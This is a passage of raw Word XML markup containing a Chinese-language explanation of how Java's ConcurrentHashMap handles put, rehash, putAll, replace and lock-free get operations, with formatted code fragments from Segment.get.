          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>否则创建一个新的结点并添加到</w:t>
      </w:r>
      <w:r w:rsidRPr="008C10BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="008C10BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>链的头部</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，这时一定要修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>modCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的值，同样修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的值一定要放在最后一步。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法调用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>rehash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>reash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法实现得也很精巧，主要利用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的大小为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>2^n</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，这里就不介绍了。</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修改操作还有</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>putAll</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>putAll</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>就是多次调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法，没什么好说的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>甚至不用做结构上的更改，实现要比</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>delete</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>要简单得多，理解了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>delete</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，理解</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>就不在话下了，这里也不介绍了。</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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>获取操作</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C75E91" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00C75E91">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首先看下</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>操作，同样</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>操作是直接委托给</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Segment</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法，直接看</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Segment</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>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V get(Object key, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> hash) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (count != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) { </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// read-volatile</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2"/>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HashEntry&lt;K,V&gt; e = getFirst(hash);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>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while</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (e != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w: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2"/>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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (e.hash == hash &amp;&amp; key.equals(e.key)) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>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V v = e.value;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (v != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</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2"/>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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> v;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>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lastRenderedPageBreak/>
        <w:t>                </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> readValueUnderLock(e); </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// recheck</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2"/>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2"/>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e = e.next;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>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2"/>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2"/>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return</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null</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2"/>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get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>操作不需要锁。第一步是访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>变量，这是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
